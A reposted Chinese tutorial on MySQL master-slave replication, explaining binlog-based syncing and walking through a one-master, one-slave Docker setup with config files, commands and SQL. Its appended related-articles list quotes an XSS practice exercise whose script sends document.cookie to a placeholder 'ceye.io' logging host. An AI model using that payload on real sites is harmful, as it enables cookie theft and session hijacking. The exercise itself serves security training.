MySQL主从同步集群(Docker搭建)

 以下笔记都是基于黑马程序员的面试题写的:

Mysql定位慢查询-CSDN博客

Mysql索引-CSDN博客

MySQL事物相关-CSDN博客

MySQL主从同步集群(Docker搭建)-CSDN博客

MySQL相关面试问题总结-CSDN博客


        主从同步(Master-Slave Replication)是数据库集群中常用的高可用、高并发解决方案,通过将主数据库(Master)的数据变更同步到从数据库(Slave),实现数据的多副本存储和读写分离。

一、主从同步的核心目标

  1. 数据备份:从库作为主库的副本,避免单库故障导致数据丢失。
  2. 读写分离:主库负责写操作(INSERT/UPDATE/DELETE),从库负责读操作(SELECT),分散数据库压力,提升并发能力。
  3. 故障转移:主库故障时,可将从库切换为主库,保证服务连续性。

二、工作原理

MySQL主从复制的核心就是二进制日志。

二进制日志(BINLOG)记录了所有的 DDL(数据定义语言)语句和 DML(数据操纵语言)语句,但不包括数据查询(SELECT、SHOW)语句。

复制分成三步:

  1. Master 主库在事务提交时,会把数据变更记录在二进制日志文件 Binlog 中。
  2. 从库读取主库的二进制日志文件 Binlog ,写入到从库的中继日志 Relay Log 。
  3. slave重做中继日志中的事件,将改变反映它自己的数据。

三、主从同步的常见架构

一主一从:最简单的架构,主库写入,从库备份 + 读。

一主多从:主库连接多个从库,分担更多读压力(如电商详情页的高频查询)。

级联复制(主 -> 从 -> 从):主库只同步给一个从库,该从库再同步给其他从库,减轻主库的 binlog 发送压力。

四、Docker搭建MySQL主从同步集群

1.环境

centos7,MySQL8.0.19、MobaXterm

目的:

实现MySQL主从同步集群——一主一从

2.步骤

1.拉取镜像并创建网络

拉取镜像:

docker pull mysql:8.0.19

创建网络:

docker network create mysql-net

2.创建挂载目录

master:

创建挂载目录:

mkdir -p mysql-demo/master3307/{conf,data,logs}

vi /home/hl/mysql-demo/master3307/conf/my.cnf 

vi /home/hl/mysql-demo/master3307/logs/mysql-slow.log

将以下内容复制进my.cnf:

[mysqld]
# 开启慢查询日志
slow_query_log = 1
# 慢查询日志路径(需对应容器内路径,已挂载到本地 /docker/mysql/logs)
slow_query_log_file = /var/log/mysql/mysql-slow.log
# 慢查询阈值(单位:秒,超过此值的 SQL 会被记录)
long_query_time = 1# 主库唯一ID(必须与从库不同)
server-id=1  
# 开启binlog,日志文件名前缀
log_bin=mysql-bin 
# 二进制日志过期清理时间。默认值为0,表示不自动清理。
expire_logs_days=7

赋予权限:

chown -R 999:999 /home/hl/mysql-demo/master3307/logs

slave操作同上,my.cnf内容不同:

[mysqld]
# 从库唯一ID(必须与主库不同)
server-id = 2  
# 中继日志文件名前缀
relay_log = mysql-relay-bin  
# 从库设为只读(可选,增强安全性,root用户不受限)
read_only = 1  

3.创建容器

docker run -d \--name mysql-master \--network mysql-net \-p 3307:3306 \-e MYSQL_ROOT_PASSWORD=1234 \-v /home/hl/mysql-demo/master3307/conf:/etc/mysql/conf.d \-v /home/hl/mysql-demo/master3307/data:/var/lib/mysql \-v /home/hl/mysql-demo/master3307/logs:/var/log/mysql \mysql:8.0.19
docker run -d \--name mysql-slave \--network mysql-net \-p 3308:3306 \-e MYSQL_ROOT_PASSWORD=1234 \-v /home/hl/mysql-demo/slave3308/conf:/etc/mysql/conf.d \-v /home/hl/mysql-demo/slave3308/data:/var/lib/mysql \-v /home/hl/mysql-demo/slave3308/logs:/var/log/mysql \mysql:8.0.19

4.配置主库

进入主库 MySQL 命令行,查看慢日志是否开启:


# 进入容器
docker exec -it mysql8 bash# 登录 MySQL
mysql -u root -p# 查看慢查询配置
SHOW VARIABLES LIKE 'slow_query_log';  # 应显示 ON
SHOW VARIABLES LIKE 'long_query_time'; # 应显示 1.000000
SHOW VARIABLES LIKE 'slow_query_log_file'; # 应显示日志路径

不用退出,执行 SQL 创建用于从库同步的用户(如repl,密码repl123):

-- 删除原用户(若存在)
DROP USER 'repl'@'%';
-- 重新创建用户,指定认证插件为 mysql_native_password
CREATE USER 'repl'@'%' IDENTIFIED WITH mysql_native_password BY 'repl123';
-- 授予复制权限
GRANT REPLICATION SLAVE ON *.* TO 'repl'@'%';
-- 刷新权限
FLUSH PRIVILEGES;-- 查看主库binlog信息(记录文件名和位置,后续从库配置需要)
SHOW MASTER STATUS;

需记录FilePosition:

5.配置从库

进入从库,执行 SQL 配置主库连接信息(替换为实际的FilePosition、主库 IP / 容器名):

-- 停止同步(若已配置过)
STOP SLAVE;-- 配置主库信息
CHANGE MASTER TOMASTER_HOST='mysql-master',  # 主库容器名(或主机IP,需在同一网络)MASTER_USER='repl',          # 主库创建的同步用户MASTER_PASSWORD='repl123',   # 同步用户密码MASTER_LOG_FILE='mysql-bin.000003',  # 主库SHOW MASTER STATUS中的FileMASTER_LOG_POS=1750;          # 主库SHOW MASTER STATUS中的Position-- 启动同步
START SLAVE;-- 查看从库同步状态(关键看Slave_IO_Running和Slave_SQL_Running是否为Yes)
SHOW SLAVE STATUS\G

若输出中:

Slave_IO_Running: Yes
Slave_SQL_Running: Yes

则表示主从同步配置成功。

3.验证主从同步

主库插入数据
主库 MySQL 命令行执行:

USE test;
CREATE TABLE t1 (id INT PRIMARY KEY AUTO_INCREMENT, name VARCHAR(20));
INSERT INTO t1 (name) VALUES ('test1'), ('test2');

从库查询数据
从库 MySQL 命令行执行:

USE test;
SELECT * FROM t1;

若能查询到主库插入的test1test2,则同步成功。

五、相关面试问题

5.1 主从同步的原理是什么?

        主从同步的核心就是二进制文件binlog,其中记录了全部的DDL语句和DML语句,但不包括数据查询(SELECT、SHOW)语句。

        主从同步复制分为以下三步:

        第一,master主库在事物提交时,将数据变更语句写入到binlog中。

        第二,从库读取binlog中的记录,并写入到中继日志replay log中。

        第三,从库执行replay log中的语句,实现与主库数据的同步。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/bicheng/90164.shtml
繁体地址,请注明出处:http://hk.pswp.cn/bicheng/90164.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

NISP-PTE基础实操——XSS

pteXSS模拟1 <script> var img document.createElement("img");img.src"http://xxxxx.ceye.io/log?"escape(document.coo kie);document.body.appendChild(img); </script> 重放加Cookie头 pteXSS模拟2 <script type"text/javasc…

基于网络爬虫的在线医疗咨询数据爬取与医疗服务分析系统,技术采用django+朴素贝叶斯算法+boostrap+echart可视化

摘要 为了发挥互联网医疗问询服务平台在客观衡量医疗服务质量、进一步分析和挖掘网民评论数据方面的作用&#xff0c;本文完成了互联网医疗问询数据抓取与医疗服务质量服务分析平台的主要模块应用&#xff0c;如用户登录注册、医疗服务质量数据分析与信息可视化以及用户情绪识别…

【备忘录】Ubuntu 配置 NFS

安装 NFSsudo apt-get install nfs-kernel-server rpcbind启动 NFSsudo systemctl start nfs-server查看 NFSsudo service nfs-server status

【coze扣子】第1篇:coze快速入门

文章目录coze扣子Coze优点Coze智能体快速入门1、登录进入到个人主页2、创建智能体3、智能体组成部分4、智能体的发布人设与回复逻辑LLM模型配置模型设置生成多样性(抽象程度)Top P&#xff08;话痨程度&#xff09;重复语句惩罚携带上下文轮数最大回复长度技能插件触发器定时触…

PyCharm 入门指南:起步学习、开发环境一体

PyCharm 入门指南一、前置准备&#xff1a;为什么选择 PyCharm&#xff1f; 对于 Python 初学者&#xff0c;PyCharm 是最友好的集成开发环境&#xff08;IDE&#xff09;之一。它通过智能代码提示、自动纠错、调试工具、版本控制集成等功能&#xff0c;大幅降低开发门槛。本文…

【Java企业级开发】(六)Java框架技术-Maven和MyBatis

一、Maven 1.1 非Maven项目的缺点 问题一&#xff1a; 项目中的jar包资源需要我们自己从网上下载后&#xff0c;手动导入到项目中使用&#xff0c;不好管理 问题二&#xff1a; jar包版本控制麻烦 1.2 Maven介绍 Maven是使用Java语言编写的基于项目对象模型&#xff08;POM&am…

学习秒杀系统-页面优化技术

文章目录前言页面缓存URL缓存对象缓存页面缓存取缓存手动渲染URL缓存对象缓存页面静态化&#xff0c;前后端分离&#xff08;常用&#xff09;GET POST区别如何解决超卖&#xff1f;重复卖&#xff1f;&#xff08;简单版&#xff09;静态资源优化多个JS/CSS组合&#xff0c;减…

QCC系列显示交互层的自研技术突破与实践

在音频设备智能化进程中&#xff0c;显示交互的流畅度与兼容性已成为用户体验的核心指标。传统方案中&#xff0c;TFT 彩屏与多语言适配常面临硬件驱动冲突、功耗失控、字符显示错乱等问题。作为高通平台十年级方案商&#xff0c;腾泰技术在 QCC 系列中聚焦显示交互层的自研技术…

JMeter 实现 Protobuf 加密解密

一、 .proto文件编译成.jar文件 相关依赖下载详见&#xff1a;将 message.proto 编译成 .jar文件 1.依赖于java编译环境 2.依赖protoc编译jar包 编译目录 1.创建一个根目录&#xff1a;protobuf 2.在protobuf下创建build、output、lib、src目录 lib&#xff1a;放 protobu…

发票识别在费控系统应用剖析

一、发票识别与费控系统的融合价值1.1 解决传统费控痛点效率瓶颈突破&#xff1a;将人工处理每张发票的5-8分钟缩短至秒级自动识别准确性飞跃&#xff1a;关键字段识别准确率从人工的95%提升至99%以上合规性强化&#xff1a;自动对接税务系统验真&#xff0c;虚假发票识别率提升…

Rust实战:决策树与随机森林实现

基于 Rust 实现决策树(Decision Tree)和随机森林(Random Forest)的实例 Linfa的基本定义 Linfa是意大利语中“淋巴”(lymph)的意思,在医学领域指淋巴系统相关的结构或功能。淋巴系统由淋巴管、淋巴结、脾脏等组成,负责免疫防御和体液平衡。 Linfa在生物学中的作用 …

9. isaacsim4.2教程-ROS加相机/CLOCK

在本示例中&#xff0c;我们将学习如何&#xff1a; 向场景中添加额外的相机并将其安装在机器人上 添加相机发布器&#xff08;Camera Publishers&#xff09; 通过 rostopics 发送真实的合成感知数据&#xff08;ground truth synthetic perception data&#xff09; 前提…

微信小程序171~180

1.封装购物车接口API import http from /utils/httpexport const reqAddCrt ({ goodsId, count, ...data }) > {return http.get(/cart/addToCart/${goodsId}/${count}, data) }export const reqCartList () > {return http.get(/cart/getCartList) }export const reqU…

修改 docker 容器的挂载配置(保持数据不丢的情况)

一、核心原理Docker 容器的运行时配置&#xff08;包括挂载&#xff09;是启动时确定的&#xff0c;一旦启动无法直接修改。因此&#xff0c;需通过以下步骤实现&#xff1a;保存原容器中的数据&#xff08;避免丢失&#xff09;&#xff1b;基于原镜像创建新容器&#xff0c;同…

MVCC(多版本并发控制)介绍及实现原理

一、什么是MVCC&#xff1f; MVCC&#xff08;Multi-Version Concurrency Control&#xff0c;多版本并发控制&#xff09;是数据库中用于解决并发访问问题的一种机制。它通过为数据维护多个版本&#xff0c;让读写操作在不同版本上独立进行&#xff0c;从而避免了传统锁机制中…

密码学基础概念详解:从古典加密到现代密码体系

一、引言&#xff1a;为什么我们需要密码学&#xff1f; 在数字化时代&#xff0c;信息已成为核心生产要素&#xff0c;而信息安全则是保障社会运转的基石。当我们在电商平台输入银行卡密码时&#xff0c;当我们通过即时通讯工具发送私密消息时&#xff0c;当企业在云端存储核心…

小鹏汽车视觉算法面试30问全景精解

小鹏汽车视觉算法面试30问全景精解 ——智能驾驶 车路协同 视觉创新:小鹏汽车视觉算法面试核心考点全览 前言 小鹏汽车作为中国智能电动汽车的创新引领者,致力于通过AI与自动驾驶技术推动智能出行的变革。小鹏视觉算法团队深耕自动驾驶感知、车路协同、智能座舱、3D重建…

程序是如何生成的-以c语言为例

一&#xff0c;序言 从代码到能跑的程序&#xff0c;整个过程就像 “把外文翻译成母语&#xff0c;再组装成能直接用的东西”&#xff0c;一步步来更清楚&#xff1a; 源代码&#xff08;程序员写的代码&#xff0c;如C语言文件&#xff09;↓ 预处理&#xff08;处理#开头的命…

风险识别清单:构建动态化的风险管理体系

在项目管理实践中&#xff0c;风险识别是确保项目成功的关键环节。PMBOK提出的风险提示清单&#xff08;Prompt List&#xff09;为项目团队提供了一个系统化的思考框架&#xff0c;帮助突破个人经验局限&#xff0c;实现更全面的风险覆盖。这一工具的价值不仅在于其提供的标准…

从“点状用例”到“质量生态”:现代软件测试的演进、困局与破局

测试的三次范式跃迁业务高速迭代下的四大困局质量工程化&#xff1a;流程、平台、度量三位一体左移与右移&#xff1a;把缺陷扼杀在摇篮&#xff0c;也把监控铺到坟墓自动化金字塔的再平衡&#xff1a;UI、API、单元、契约、e2e数据驱动测试&#xff1a;从“拍脑袋”到“科学实…